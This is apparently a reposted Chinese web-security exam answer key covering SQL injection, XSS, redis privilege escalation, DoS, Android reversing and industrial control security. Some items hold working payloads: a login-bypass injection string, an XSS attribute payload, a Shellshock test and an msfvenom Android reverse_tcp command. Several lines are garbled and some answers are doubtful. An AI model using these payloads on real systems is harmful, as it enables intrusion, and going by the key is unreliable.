您的答案: 标准答案: A

9、下列对于redis提权的说法错误的是?

A、 redis在root权限下运行,导致了可提权

B、 如果目标机ssh未启用公钥登录,则可能提权失败

C、 提权的过程是将redis公钥保存在redis的配置文件中,然后将配置文件保存在root目录下的.ssh目录,进而使用私钥登录进行root用户

D、 如果设置了redis的访问密码就不会有被提权风险

您的答案: 标准答案: D

10、下列关于TCP三次握手的描述错误的是?

A、 为了提供可靠的数据传输,所以需要三次握手协议

B、 tcp的数据传输是在完成了三次握手协议之后才开始的

C、 在三次握手协议中,服务器会维护一个队列,来维持每个客户端与服务器的三次握手协议的进行

D、 cc攻击就是利用了tcp三次握手协议来发起的一种DDOS攻击

您的答案: 标准答案: D

11、下面关于CC攻击的描述正确的是?

A、 频繁访问需要占用大量系统资源的服务,导致系统资源耗尽从而达到拒绝服务的目的

B、 利用服务应用本身缺陷导致程序崩溃停止服务

C、 利用网络协议本身的运作机制构造一场数据包,导致服务端口阻塞

D、 利用大带宽流量和海量连接数封堵服务端口

您的答案: 标准答案: A

12、下面对于synflood攻击的原理描述正确的是?

A、 频繁访问需要占用大量系统资源的服务,导致系统资源耗尽从而达到拒绝服务的目的

B、 利用服务应用本身缺陷导致程序崩溃停止服务

C、 利用tcp/ip协议的3次握手机制,伪造无效IP,造成服务器长期等待握手响应无法释放资源造成服务器拒绝服务

D、 利用大带宽流量和海量连接数封堵服务端口

您的答案: 标准答案: C

13、下列对于PHP防sql注入的方法描述错误的是?

A、 PHP的PDO技术,通过参数化查询将参数与查询语句分别执行,从根本上杜绝sql注入

B、 当设置magic_quotes_gpc=on的时候,PHP会对用户通过任何方式传来的所有参数进行Addslashes()过滤

C、 Intval()将变量转换成整形变量,对于数字型注入具有很好的防御效果

D、 Addslashes(),对参数进行单引号、双引号、反斜杠以及NULL进行转义

您的答案: 标准答案: B

14、下列对于MD5加密与解密的描述错误的是?

A、 MD5加密是不可逆的

B、 MD5可以用来加密数据,防止信息泄露,需要使用的时候可以解密获取

C、 MD5加密目前只能通过枚举法来破解

D、 MD5使用的是HASH算法,在计算过程中可能有部分信息丢失

您的答案: 标准答案: B

15、下列对于redis未授权访问漏洞的描述正确的是?

A、 redis系统默认弱口令,并且暴漏在公网上

B、 redis存在未授权访问漏洞,需要升级打补丁

C、 redis默认安装没有访问控制,需要修改配置文件启用访问限制并且设置密码

D、 操作系统漏洞,由于系统安全配置不当导致redis未授权访问

您的答案: 标准答案: C

16、白帽子,在没有经过厂商允许的前提下,进入目标主机并下载了大量敏感信息,没有使用敏感数据谋取财富,并且上交到漏洞响应平台,这样的行为是否违法?

A、 违法

B、 不违法

您的答案: 标准答案: A

17、Addslashes()函数不对____字符进行转义。

A、 单引号

B、 双引号

C、 NULL

D、 斜杠

您的答案: 标准答案: D

18、下列不属于MVC架构中视图的作用的是____。

A、 解释模型

B、 发送用户输入给控制器

C、 允许控制器选择视图

D、 选择响应的视图

您的答案: 标准答案: D

19、下列选项关于FTP(File Transfer Protocol)传输方向描述正确的是?

A、 单向传输

B、 双向传输

C、 多方向传输

您的答案: 标准答案: B

20、数据帧往出发送数据时,每帧长度超出____则需要切片。

A、 1000B

B、 1100B

C、 1300B

D、 1500B

您的答案: 标准答案: D

21、synflood(拒绝服务攻击)是基于____协议的。

A、 TCP

B、 UDP

C、 ICMP

D、 IGMP

您的答案: 标准答案: A

22、TCP中RST标志位置1,则表拒绝连接。

A、 正确

B、 错误

您的答案: 标准答案: A

23、下列不属于MVC架构中视图的作用的是?

A、 解释模型

B、 发送用户输入给控制器

C、 允许控制器选择视图

D、 选择响应的视图

您的答案: 标准答案: D

24、CMS通常情况下均基于MVC架构。

A、 正确

B、 错误

您的答案: 标准答案: A

25、下列选项中属于绕过签名验证机制的安卓漏洞是____。

A、 Stagefright漏洞

B、 WebView漏洞

C、 master key漏洞

D、 launchAnyWhere漏洞

您的答案: 标准答案: C

26、下列选项中不能提升密码强度的是____。

A、 不使用弱口令

B、 使用个人身份信息

C、 一定时间段必须更换密码

D、 尽可能增加密码复杂度(大小写字母、数字、特殊字符)

您的答案: 标准答案: B

27、RFID技术窃取银行卡中的信息不包括____。

A、 姓名

B、 身份证号码

C、 银行卡号码

D、 密码

您的答案: 标准答案: D

28、USIM和SIM卡最大的不同是____。

A、 保密信息

B、 IMSI

C、 序列号

D、 内存

您的答案: 标准答案: A

29、威胁情报中情报处理的手段不包括____。

A、 数据挖掘

B、 关联分析、机器学习

C、 情报统一存储

D、 可视化分析、专家分析

您的答案: 标准答案: C

30、云内安全挑战不包括____。

A、 云数据中心内部攻击防御困难

B、 云内性能处理优化

C、 云内部的流量及威胁防护困难

D、 安全的任意扩展、动态部署和迁移·

您的答案: 标准答案: B

31、云数据中的安全策略不包括____。

A、 交换机ACL、可信计算

B、 提高云数据中心的硬件性能

C、 云查杀

D、 云WAF

您的答案: 标准答案: B

32、下列对网络靶场理解不正确的是____。

A、 靶场内有真实个人数据

B、 是一个实验环境

C、 仿真真实网络的各种行为

D、 根据实战进行设计

您的答案: 标准答案: A

33、下列哪个是机器学习的常用算法?

A、 冒泡排序

B、 关联规则学习

C、 RSA算法

D、 DES算法

您的答案: 标准答案: B

34、白帽子开发的黑客工具在网络传播,被不法分子所利用,造成了严重的后果,那工具的开发者需要承担法律责任吗?

A、 不需要承担法律责任

B、 需要承担法律责任

您的答案: 标准答案: B

35、下列哪一项不是CSRF漏洞可能造成的风险?

A、 开启路由器远程管理功能

B、 信息泄露

C、 缓冲区溢出

D、 XSS攻击

您的答案: 标准答案: C

36、什么是拒绝服务攻击

A、 远程或本地正常的服务停止工作

B、 服务器卡机

C、 蓝屏

D、 网络正常使用

您的答案: 标准答案: A

37、那个协议需要验证并双方效验?

A、 ftps

B、 UDP/IP

C、 UDP

D、 TCP

您的答案: 标准答案: D

38、cc攻击使用的哪一个工具

A、 watch

B、 oclHashcat

C、 burp

D、 TCP/IP

您的答案: 标准答案: A

39、ipconfig /displaydns是什么指令

A、 可以看到机器当前DNS缓存列表

B、 可以看到机器当前IP列表

C、 查看跨域地址

D、 查看路由器地址

您的答案: 标准答案: A

40、还原.net代码混淆工具

A、 lLspy

B、 de4dot

C、 Reflector

D、 uedit32

您的答案: 标准答案: B

41、安卓系统最早起源来于?

A、 Linux

B、 JAVA

C、 C+

D、 .net

您的答案: 标准答案: A

42、4.3安卓系统WEbkit漏洞修补方法

A、 禁止访问

B、 删除代码

C、 关闭接口

D、 去掉空白字符

您的答案: 标准答案: D

43、DedeCMS5.7远程文件包含漏洞中存在变量覆盖漏洞的语句是

A、 foreach($$_trwurdy sd $_k => $_v) k = R u n M a g i c Q u o t e s ( _k = RunMagicQuotes( k=RunMagicQuotes(_v);

B、 foreach($$_trwurdy sd $_k => $_v) ( ( (_k) = RunMagicQuotes($_v);

C、 foreach($$_trwurdy sd $_k => $_v) [ [ [_k] = RunMagicQuotes($_v);

D、 foreach($$_trwurdy sd $_k => $_v) KaTeX parse error: Expected '}', got 'EOF' at end of input: {_k} = RunMagicQuotes($_v);

您的答案: 标准答案: D

44、文件包含分为本地文件包含和远程文件包含

A、 对

B、 错

您的答案: 标准答案: A

45、Discuz使用了以下哪种标记语言??()

A、 Muse

B、 AsciiDoc

C、 BBCode

D、 Textile

您的答案: 标准答案: C

46、以下选项中,Discuz存储型DOM XSS攻击使用的payload正确的是?()

A、 [align=οnmοuseοver="alert(1)]

B、 [align="οnmοuseοver="alert(1)]

C、 [align="οnmοuseοver=alert(1)]

D、 [align="οnmοuseοver=“alert(1)”]

您的答案: 标准答案: B

47、通过告警日志分析攻击事件的基本技能不包括以下哪个选项?()

A、 网络协议基础知识

B、 网站架构基础知识

C、 程序代码编写能力

D、 网站常见攻击手段

您的答案: 标准答案: C

48、御剑在进行后台探测时发送的HTTP请求方式是?()

A、 POST

B、 HEAD

C、 GET

D、 OPTIONS

您的答案: 标准答案: B

49、告警信息原始报文中可以看到的信息不包括以下哪个选项?()

A、 攻击者发送的HTTP请求

B、 服务器返回的响应信息

C、 服务器的网络拓扑结构

D、 攻击者使用的IP地址

您的答案: 标准答案: C

50、MYSQL远程登录成功会生成安全审计类告警信息。()

A、 对

B、 错

您的答案: 标准答案: A

1、Web程序中出现以下哪种情况能形成漏洞?()

A、 可控变量进入正常函数

B、 可控变量进入危险函数

C、 不可控变量进入正常函数

D、 不可控变量进入危险函数

您的答案: 标准答案: B

2、以下哪个选项是SQL注入payload中#的作用?()

A、 闭合前面sql语句

B、 闭合后面sql语句

C、 注释前面sql语句

D、 注释后面sql语句

您的答案: 标准答案: D

3、以下哪个选项是PHPCMS中存在SQL注入漏洞的字段?()

A、 Accept

B、 Referer

C、 User-Agent

D、 X-Forwarded-For

您的答案: 标准答案: B

4、在PHPCMS SQL注入漏洞中构造的payload是使用的以下哪种方法?()

A、 insert插入

B、 select查询

C、 group by报错

D、 update更新

您的答案: 标准答案: C

5、insert into语句一次不可以向数据库插入多条数据。

A、 对

B、 错

您的答案: 标准答案: B

6、SQL注入漏洞获取的HTTP_X_FORWARDED_FOR字段对应HTTP请求头中的哪个字段?()

A、 Forwarded

B、 Forwarded_For

C、 X_Forwarded

D、 X_Forwarded_For

您的答案: 标准答案: D

7、在BlueCMS1.6 SQL注入漏洞中构造的payload是使用的以下哪种方法?()

A、 闭合update语句,将敏感数据读取到页面中

B、 构造delete语句,将敏感数据读取到页面中

C、 闭合insert语句,将敏感数据插入到评论表

D、 构造union语句,将敏感数据插入到评论表

您的答案: 标准答案: C

8、XML注入漏洞字段HTTP_RAW_POST_DATA在以下哪种情况下会生成?()

A、 POST发送可识别的MIME类型数据

B、 POST发送不可识别的MIME类型数据

C、 客户端发送GET请求

D、 客户端发送HEAD请求

您的答案: 标准答案: B

9、在xml中,CDATA区段的文本会被xml解析器忽略。

A、 对

B、 错

您的答案: 标准答案: A

10、PHPYun XML注入漏洞构造payload时使用的是哪个SQL关键词?()

A、 update

B、 insert

C、 union

D、 delete

您的答案: 标准答案: C

11、需要如何修改HTTP请求才能触发XML注入漏洞?()

A、 Content-Type:text/html;

B、 Content-Type:application/x-www-form-urlencoded;

C、 Content-Type:text/plain;

D、 Content-Type:text/xml;

您的答案: 标准答案: D

12、在Bash中哪个命令可以将局部变量变成全局变量?()

A、 exec

B、 expand

C、 export

D、 expr

您的答案: 标准答案: C

13、存在远程命令执行漏洞的Bash中输入export v=’() { echo “X”;}; echo “Y”’;bash会输出X。

A、 对

B、 错

您的答案: 标准答案: B

14、以下选项中哪个PHP的函数可以执行系统命令?()

A、 var_dump

B、 request

C、 system

D、 extract

您的答案: 标准答案: C

15、以下哪个PHP函数可以将数据写入文件?()

A、 readfile

B、 fopen

C、 file_put_contents

D、 file_get_contents

您的答案: 标准答案: C

16、PHP中的extract函数的作用是从数组中将变量导入到当前的符号表。

A、 对

B、 错

您的答案: 标准答案: A

17、PHP执行eval(phpinfo())时,会返回什么信息?()

A、 服务器网络配置信息

B、 服务器php配置信息

C、 服务器系统配置信息

D、 服务器硬件配置信息

您的答案: 标准答案: B

18、以下选项中哪种情况可以导致PHP代码执行漏洞?()

A、 用户通过浏览器提交执行命令,客户端没有针对执行函数做过滤

B、 用户通过浏览器提交执行命令,客户端针对执行函数做过滤

C、 用户通过浏览器提交执行命令,服务器端针对执行函数做过滤

D、 用户通过浏览器提交执行命令,服务器端没有针对执行函数做过滤

您的答案: 标准答案: D

19、PHP代码执行漏洞可以调用system函数执行系统命令。

A、 对

B、 错

您的答案: 标准答案: A

20、PHP脚本<?php echo preg_replace('/\{\?([^}]+)\}/e',"$1","{?md5(123)}"); ?>会输出什么内容?()

A、 ?md5(123)

B、 {?md5(123)}

C、 202cb962ac59075b964b07152d234b70

D、 {?md5(123)}

您的答案: 标准答案: C

21、Web目录下的upload/test.zip文件通过以下哪种链接可以下载?()

A、 upload/…/test.zip

B、 upload/…/./test.zip

C、 config/…/upload/test.zip

D、 config/././upload/test.zip

您的答案: 标准答案: C

22、Windows平台下的Web目录下的test.php不能通过test.PhP访问。

A、 对

B、 错

您的答案: 标准答案: B

23、PHP执行函数strrpos(“I_love_php.php”,".php")会返回什么值?()

A、 7

B、 8

C、 9

D、 10

您的答案: 标准答案: D

24、PHP执行函数strtolower(“PHP”)会返回什么值?()

A、 php

B、 Php

C、 PHp

D、 PHP

您的答案: 标准答案: A

25、PHP执行 t e = ( 1 + 2 ) ? 4 : 6 ; 之 后 , te=(1+2)?4:6;之后, te=(1+2)?4:6;,te的值是什么?()

A、 1

B、 2

C、 4

D、 6

您的答案: 标准答案: C

26、以下选项中对"multipart/form-data"的解释不正确的是?()

A、 基础方法是post请求

B、 基础方法是get请求

C、 http协议本身的原始方法不支持multipart/form-data

D、 可用于文件上传时,设置表单的MIME类型

您的答案: 标准答案: B

27、以下哪个选项的内容可以替代SQL语句中的空格?()

A、 /**/

B、 #

C、 –

D、 //

您的答案: 标准答案: A

28、PHP的addslashes函数的作用是什么?()

A、 去除字符串中的预定义字符

B、 将字符串中的预定义字符之前添加反斜杠

C、 将字符串按照预定义字符进行分割

D、 将字符串中的预定义字符替换为空格

您的答案: 标准答案: B

29、mysql数据库使用utf-8字符集可能导致宽字节注入。

A、 对

B、 错

您的答案: 标准答案: B

30、%df’在以下哪种情况下能闭合单引号,形成宽字节注入?()

A、 使用PHP的trim函数,字符集使用utf-8

B、 使用PHP的trim函数,字符集使用gbk

C、 使用PHP的addslashes函数,字符集使用utf-8

D、 使用PHP的addslashes函数,字符集使用gbk

您的答案: 标准答案: D

31、以下哪种方式可以防止宽字节注入?()

A、 mysql_query(“set names gbk”)和addslashes()函数结合使用

B、 使用mysql_query(“set names gbk”)设置字符集

C、 mysql_set_charset(“gbk”)和mysql_real_escape_string()函数结合使用

D、 使用mysql_set_charset(“gbk”)设置字符集

您的答案: 标准答案: C

32、以下哪个选项对asp运算符的解释错误?()

A、 <>为不等于

B、 IS判断两个字符串是否相等

C、 XOR为"异或"运算

D、 OR为"或"运算

您的答案: 标准答案: B

33、SQL语句"select * from user where name=’". n a m e . &quot; ′ a n d p a s s = ′ &quot; . name.&quot;&#x27; and pass=&#x27;&quot;. name."andpass=".pass."’"如何绕过登录?()

A、 $name设置值为admin’ and ‘1’=‘1’ $pass的值为123456

B、 $name设置值为admin’ and ‘1’='1 $pass的值为123456

C、 $name设置值为admin’ or ‘1’='1 $pass的值为123456

D、 $name设置值为admin’ or ‘1’=‘1’ $pass的值为123456

您的答案: 标准答案: C

34、以下选项中哪些措施不能防御CSRF攻击?()

A、 使用一次性Token验证

B、 在HTTP头中自定义属性并验证

C、 全部操作使用POST传递数值

D、 使用复杂度高的验证码

您的答案: 标准答案: C

35、以下哪个函数是作为FLASH与宿主界面JavaScript通信的接口?()

A、 External.call

B、 ExternalConfig.call

C、 ExternalInterface.call

D、 Externalrunning.call

您的答案: 标准答案: C

36、以下哪个选项的内容是JavaScript中的注释符?()

A、 ~

B、 //

C、 *

D、 #!

您的答案: 标准答案: B

37、以下哪个选项对于反射型XSS的描述是错误的?()

A、 可以结合CSRF来利用

B、 攻击代码存储在客户端

C、 攻击代码存储在服务端

D、 可以劫持用户访问链接

您的答案: 标准答案: C

38、以下哪个选项可以成功的设置Web应用浏览器端的Cookie值?()

A、 在浏览器Console中输入document.cookie=“test=123456”

B、 在浏览器Console中输入document.cookie(“test=123456”)

C、 在浏览器地址栏中输入document.cookie=“test=123456”

D、 在浏览器地址栏中输入document.cookie(“test=123456”)

您的答案: 标准答案: A

39、技术流的完整提供测试不包含下面那一项?

A、 勘察探索

B、 监测捕获

C、 错误定位

D、 错误修复

您的答案: 标准答案: D

40、以下哪个选项不属于安全测试的流程?

A、 信息汇总

B、 交互测试

C、 审核验证

D、 项目交接

您的答案: 标准答案: D

41、软件开发安全生产解决方法不包含哪一项?

A、 溯源检测

B、 合规检测

C、 安全检测

D、 应急响应

您的答案: 标准答案: D

42、安全检测需要嵌入到软件开发流程中。

A、 对

B、 错

您的答案: 标准答案: A

43、HTTPS的设计是可以避免下列哪种攻击?

A、 SQL注入攻击

B、 跨站脚本攻击

C、 中间人攻击

D、 暴力破解攻击

您的答案: 标准答案: C

44、同源策略不包含下面那一项?

A、 协议

B、 路径

C、 端口号

D、 域名

您的答案: 标准答案: A

45、哪些设置可以有效的避免cookie的完整性所带来的安全问题?

A、 Shared domain providers

B、 Website development/deployment

C、 Exploration of Cookie Policy Change

D、 HTTPS instead of HTTP

您的答案: 标准答案: D

46、App-web接口检测系统架构的组成包含哪些?

A、 Triggering

B、 Detection

C、 Provenance

D、 Counterattack

您的答案: 标准答案: D

47、App-web接口检测系统使用哪种方法识别APP上的广告?

A、 特征码

B、 接口扫描

C、 机器学习

D、 分类标识

您的答案: 标准答案: A

48、下面哪一项不属于浏览器的防护手段?

A、 沙盒

B、 隔离堆

C、 Httponly

D、 栈cookies

您的答案: 标准答案: C

49、Redis未授权漏洞的根本原因是运维人员安全意识薄弱

A、 对

B、 错

您的答案: 标准答案: A

50、如果服务端IP为192.168.1.1,下列哪项是使用命令手动连接Redis的正确方式?

A、 redis-cli 192.168.1.1

B、 Redis -cli 192.168.1.1

C、 redis cli 192.168.1.1

您的答案: 标准答案: A

1、在汽车内网的网络结构类型中,____结构其中一个网络节点损坏会造成整个通讯瘫痪。

A、 线形

B、 星形

C、 环形

D、 星形混合形

您的答案: 标准答案: C

2、下列选项中不是LIN数据传输类型的是____。

A、 主机向从机发送消息让从机返回数据(eg.开关状态)

B、 主机初始化两个从机的通信

C、 主机发送数据到CAN级别再次返回LIN数据

D、 主机发送命令(如开关窗户)

您的答案: 标准答案: C

3、根据IOS定义,信息安全保护的核心对象是____。

A、 数据安全

B、 硬件安全

C、 软件安全

D、 资产安全

您的答案: 标准答案: D

4、根据IOS定义,信息安全保护的核心对象是____。

A、 数据安全

B、 硬件安全

C、 软件安全

D、 资产安全

您的答案: 标准答案: D

5、软件开发安全生产解决方法不包含哪一项?

A、 溯源检测

B、 合规检测

C、 安全检测

D、 应急响应

您的答案: 标准答案: D

6、安全检测需要嵌入到软件开发流程中。

A、 对

B、 错

您的答案: 标准答案: A

7、HTTPS的设计是可以避免下列哪种攻击?

A、 SQL注入攻击

B、 跨站脚本攻击

C、 中间人攻击

D、 暴力破解攻击

您的答案: 标准答案: C

8、同源策略不包含下面那一项?

A、 协议

B、 路径

C、 端口号

D、 域名

您的答案: 标准答案: A

9、哪些设置可以有效的避免cookie的完整性所带来的安全问题?

A、 Shared domain providers

B、 Website development/deployment

C、 Exploration of Cookie Policy Change

D、 HTTPS instead of HTTP

您的答案: 标准答案: D

10、App-web接口检测系统架构的组成包含哪些?

A、 Triggering

B、 Detection

C、 Provenance

D、 Counterattack

您的答案: 标准答案: D

11、App-web接口检测系统使用哪种方法识别APP上的广告?

A、 特征码

B、 接口扫描

C、 机器学习

D、 分类标识

您的答案: 标准答案: A

12、下面哪一项不属于浏览器的防护手段?

A、 沙盒

B、 隔离堆

C、 Httponly

D、 栈cookies

您的答案: 标准答案: C

13、Redis未授权漏洞的根本原因是运维人员安全意识薄弱

A、 对

B、 错

您的答案: 标准答案: A

14、如果服务端IP为192.168.1.1,下列哪项是使用命令手动连接Redis的正确方式?

A、 redis-cli 192.168.1.1

B、 Redis -cli 192.168.1.1

C、 redis cli 192.168.1.1

您的答案: 标准答案: A

15、Centos6.5下,在当前目录下,搜索文件内容包含‘aa’文字的内容的命令是 find / | xargs grep “aa” ?

A、 对

B、 错

您的答案: 标准答案: B

16、$_GET可以用于接收表单的值。

A、 对

B、 错

您的答案: 标准答案: A

17、下面哪个不是CMS?

A、 WordPress

B、 织梦

C、 帝国CMS

D、 MVC

您的答案: 标准答案: D

18、SQL注入又可以称为“PHP注入”,“JSP注入”。

A、 对

B、 错

您的答案: 标准答案: B

19、假如MySQL数据库注入点存在,“select//user()//from/**/dual”该语句是否可以成功注入绕过空格过滤。

A、 对

B、 错

您的答案: 标准答案: A

20、SQLmap可以进行表单注入。

A、 对

B、 错

您的答案: 标准答案: A

21、为了防止恶意用户爆破web登录,为们只需在登录界面加上验证码提示。

A、 对

B、 错

您的答案: 标准答案: B

22、后台登录验证都是先验证验证码是否正确,再验证用户名密码是否正确

A、 对

B、 错

您的答案: 标准答案: B

23、在验证过程中,根据返回值在本地验证,该种验证方法可绕过

A、 对

B、 错

您的答案: 标准答案: A

24、只要用户的密码足够复杂,就不存在信息泄露的风险。

A、 对

B、 错

您的答案: 标准答案: B

25、Hydra 可以爆破Windows远程登录的账号和密码

A、 对

B、 错

您的答案: 标准答案: A

26、下面哪项密码设置方式会造成被弱口令攻击的风险?

A、 增大密码的复杂度

B、 使用初始化账号密码

C、 经常更改密码

您的答案: 标准答案: B

27、下面哪个密码更合乎密码安全性规则?

A、 qazwsx123

B、 helloworld

C、 789567123

D、 AECerg.21$khlle

您的答案: 标准答案: D

28、只要密码足够复杂,就不会存在密码泄露。

A、 对

B、 错

您的答案: 标准答案: B

29、WebLogic 默认的端口号是?

A、 3306

B、 9001

C、 7359

D、 7001

您的答案: 标准答案: D

30、下面不是防止WebLogic弱口令的是?

A、 修改默认端口

B、 修改默认账号密码

C、 使用默认配置路径

您的答案: 标准答案: C

31、WebLogic是一个基于JAVAEE架构的中间件,用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。

A、 对

B、 错

您的答案: 标准答案: A

32、为了密码安全起见,密码的更换周期一般为多久?

A、 30天

B、 60天

C、 90天

D、 一年

您的答案: 标准答案: C

33、不同注册使用相同的密码。

A、 对

B、 错

您的答案: 标准答案: B

34、下面哪个不属于使用密码的好习惯?

A、 将账号密码记录在网络上

B、 经常修改密码

C、 使用密码位数大于15位且复杂度高

您的答案: 标准答案: A

35、靠欺骗别人来获得安全敏感信息的方式被称作( )。

A、 社会工程学

B、 魔法攻击

C、 暴力破解攻击

D、 诡计攻击

您的答案: 标准答案: A

36、撞库得手的原因是( )。

A、 用户扫描不安全的二维码

B、 用户为图省事,在许多网站设置相同的用户名和口令

C、 用户电脑被植入木马

D、 用户连接不安全的无线网络导致

您的答案: 标准答案: B

37、在下述产生安全口令的方法中,相比而言最安全的一项是( )。

A、 将用户名的名字,姓或名的第一个字母以及该用户的相关信息作为口令

B、 用地名、山名、著名人物、小说题目、常用英文单词作为口令

C、 组合用户的名字,形成一个字符串,将该串进行二进制表示

D、 将一个长句子使用某种安全哈希函数进行压缩,作为口令

您的答案: 标准答案: D

38、最低效的口令攻击类型是______。

A、 暴力破解攻击

B、 字典攻击

C、 彩虹表攻击

D、 机器攻击

您的答案: 标准答案: A

39、在下述产生安全口令的方法中,相比而言最安全的一项是()

A、 将用户名的名字,姓或名的第一个字母以及该用户的相关信息作为口令。

B、 用地名、山名、著名人物、小说题目、常用英文单词作为口令。

C、 组合用户的名字,形成一个字符串,将该串进行二进制表示。

D、 将一个长句子使用某种安全哈希函数进行压缩,作为口令。

您的答案: 标准答案: D

40、工业企业网由信息网络与控制网络统一组网,再与现场总线互联。

A、 对

B、 错

您的答案: 标准答案: A

41、在工业控制系统中,现场控制层的作用是?

A、 现场执行

B、 系统管理

C、 现场保护和控制设备

D、 监控功能

您的答案: 标准答案: C

42、工控网络对系统的稳定性和可用性要求非常高

A、 对

B、 错

您的答案: 标准答案: A

43、工控系统安全和IT安全巨大的区别在于对"CIA"三者关注焦点不同

A、 对

B、 错

您的答案: 标准答案: A

44、ANSI等国际标准给出了工业控制系统模型和体系几层结构?

A、 3

B、 4

C、 5

D、 6

您的答案: 标准答案: C

45、在未授权的情况下,被攻击者能够利用的缺陷攻击系统,我们称之为工控系统漏洞。

A、 对

B、 错

您的答案: 标准答案: A

46、HAVEX通过调用什么接口来获取敏感数据?

A、 IOPCServerlist

B、 HMI

C、 IOPCBrowse DCOM

D、 IOPCServerlist2 DCOM

您的答案: 标准答案: C

47、工业控制网络有几层边界?

A、 3

B、 4

C、 5

D、 6

您的答案: 标准答案: B

48、边界攻击的最终目的是控制输出模块对执行机构下达命令攻击。

A、 对

B、 错

您的答案: 标准答案: A

49、Stuxnet病毒是通过U盘,插入ICS计算机,传染给控制网络

A、 对

B、 错

您的答案: 标准答案: A

50、震网病毒修改Step7组态控制软件,修改其工程文件截获Step7与逻辑控制器的通信

A、 对

B、 错

您的答案: 标准答案: A

1、使用adb调试工具如何卸载安卓程序?

A、 使用adb install命令加APK文件的路径来卸载安卓程序

B、 使用adb uninstall命令加APK文件的路径来卸载安卓程序

C、 使用adb delete命令加APK的包名卸载安卓程序,包名可通过逆向获得

D、 使用adb uninstall命令加APK的包名卸载安卓程序,包名可通过逆向获得

您的答案: 标准答案: D

2、下列关于smali的描述错误的是?

A、 smali是安卓系统中JAVA虚拟机(Dalvik)使用的一种.dex文件的汇编器

B、 安卓系统中代码最终编译不是采用java的class,而是使用smali

C、 smali是一种安卓开发语言

D、 smali有着自己独特的语法特点

您的答案: 标准答案: C

3、通常情况下,下列哪个目录不是APK安装后释放文件的目录?

A、 /data/app/

B、 /data/data/

C、 /sdcard/android

D、 /system/bin

您的答案: 标准答案: D

4、下列关于安卓系统目录的描述错误的是?

A、 /system/bin ,存放系统本地程序,主要是linux自带的组件

B、 /system/framework ,存放系统平台框架文件

C、 /system/app ,存放常规下载的应用程序

D、 /system/lib ,存放系统的配置文件,比如APN介入点设置等核心配置

您的答案: 标准答案: D

5、下列对于Dalvik字节码的描述错误的是?

A、 package/name/ObjectName相当于java中的package.name.ObjectName

B、 [[1相当于java中的int[][]

C、 .registers指定了方法中占用内存空间大小

D、 .local 指令表名了方法中寄存器的总数

您的答案: 标准答案: D

6、下列哪项不是APK中class文件的保护的方法?

A、 名称替换

B、 字符串加密

C、 增加变量

D、 反射替换

您的答案: 标准答案: C

7、下列哪项不是APK保护中native的功能?

A、 完整性校验

B、 漏洞检测

C、 单步检测

D、 断点检测

您的答案: 标准答案: B

8、下列哪项不是预防手机中xcodeghost病毒的措施?

A、 修改icloud密码

B、 下载盘古工具进行自检

C、 卸载或更新已感染文件

D、 手机进行越狱

您的答案: 标准答案: D

9、下面对于"msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -o ichunqiu.apk"的解读错误的是?

A、 生成一个叫ichunqiu.apk的恶意文件

B、 文件安装后执行会与IP为192.168.1.2的主机进行通信

C、 设置与主机通信的端口为4444

D、 通信时手机会打开4444端口

您的答案: 标准答案: D

10、Metasploit设置的LHOST是本机实际地址而不是外网地址。

A、 正确

B、 不正确

您的答案: 标准答案: A

11、数据运算之减法运算指令"sub-float vx,vy,vz"表示什么含义?

A、 计算vy-vz并将结果存入vx

B、 计算vx-vz并将结果存入vy

C、 计算vx-vy并将结果存入vz

D、 计算vy-vx并将结果存入vz

您的答案: 标准答案: A

12、移位指令之右移指令"shr-int vx,vy,vz" 表示什么含义?

A、 右移vy,vy+1,vz指定移动的位置,结果存入vx,vx+1

B、 无符号右移vy,vz指定移动的位置,结果存入vx

C、 右移vy,vz指定移动的位置,结果存入vx

D、 无符号右移vy,vy+1,vz指定移动的位置,结果存入vx,vx+1

您的答案: 标准答案: C

13、流程控制之if指令:"if-eq vA,vB,:cond_**"的含义是什么?

A、 如果vA等于vB则跳转到:cond_**

B、 如果vA小于vB则跳转到:cond_**

C、 如果vA大于vB则跳转到:cond_**

D、 如果vA等于vB则跳转到:cond_**

您的答案: 标准答案: D

14、(Android系统中,)java代码反编译之后那种字节码方便于读取

A、 Java字节码

B、 jvm字节码

C、 Dalvik字节码

D、 .class字节码

您的答案: 标准答案: C

15、反编译smali文件里面(.registers)函数表达的意思是?

A、 类

B、 数组

C、 寄存器

D、 参数为空

您的答案: 标准答案: C

16、代码中(new-instance v1,Ljava/lang/stringBuilder;)操作指令的表达的是?

A、 new一个v1

B、 new一个ljava

C、 new一个lang/stringBuilder放到v1

D、 new一个stringBuilder放到v1

您的答案: 标准答案: D

17、这句代码(compl-float v0,v2,v2)表达的是什么指令?

A、 比较指令

B、 跳转指令

C、 数据转换指令

D、 数据运算指令

您的答案: 标准答案: A

18、smali.jar编译工具哪个命令可以编译smali为dex文件?

A、 java -jar smali.jar -o HelloWorld.smali classes.dex

B、 java -jar smali.jar -o classes.dex HelloWorld.smali

C、 java -jar -o classes.dex HelloWorld.smali

D、 java -jar -export classes.dex HelloWorld.smali

您的答案: 标准答案: B

19、ApkToolKit工具可以把dex转换成jar包?
A、 对
B、 错
您的答案: 标准答案: A

20、使用哪款反编译工具查看jar文件内容?
A、 Java Decompiler
B、 ApkToolKit
C、 jdk
D、 smali.jar
您的答案: 标准答案: A

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/AllinToyou/article/detail/338505
推荐阅读
相关标签
  

闽ICP备14008679号